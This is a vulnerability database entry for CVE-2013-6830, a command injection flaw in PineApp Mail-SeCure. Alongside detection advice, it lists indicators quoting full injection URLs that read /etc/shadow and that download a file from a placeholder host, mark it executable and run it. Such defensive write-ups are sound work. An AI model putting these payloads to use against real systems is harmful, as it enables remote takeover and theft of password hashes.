cbcvebase.
CVE-2013-6830
published 2013-11-20

CVE-2013-6830: admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms allows remote attackers to execute arbitrary commands via…

PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.93%
94.6th percentile
admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms allows remote attackers to execute arbitrary commands via shell metacharacters in the nsserver parameter during an nslookup operation.

Affected

1 ranges
VendorProductVersion rangeFixed in
pineappmail-secure_5099sk<= -

Detection & IOCsextracted from sources · hover to see the quote

path/admin/confnetworking.html
urlhttps://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow
urlhttps://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile
path/srv/www/htdocs/admin/confnetworking.html
port7443
commandcmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile
  • Detect unauthenticated GET requests to /admin/confnetworking.html containing shell metacharacters (semicolons) in the 'nsserver' query parameter, indicative of command injection attempts.
  • Monitor HTTP/HTTPS traffic on port 7443 for requests to /admin/confnetworking.html with query parameters cmd=nslookup and nsserver values containing ';', '%3B', or other shell metacharacters.
  • Alert on creation or modification of /tmp/rc.firewall, which is abused for privilege escalation to root via a weak sudoers configuration on PineApp Mail-SeCure appliances.
  • Detect outbound wget or curl requests originating from the PineApp appliance process context (qmailq user), which may indicate payload download following initial command injection.
  • Monitor SSH connections on non-standard port 7022 to the appliance, especially from external sources, as the exploit chain culminates in root SSH access via injected authorized_keys.
  • Alert on writes to /root/.ssh/authorized_keys on the appliance, as the exploit injects an attacker-controlled SSH public key to establish persistent root access.
  • ·The exploit requires no authentication; the vulnerable endpoint /admin/confnetworking.html is accessible without credentials, making network-level access control the primary mitigation.
  • ·Privilege escalation to root depends on a weak sudoers configuration specific to the appliance; not all deployments may be equally vulnerable to the full root escalation chain.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.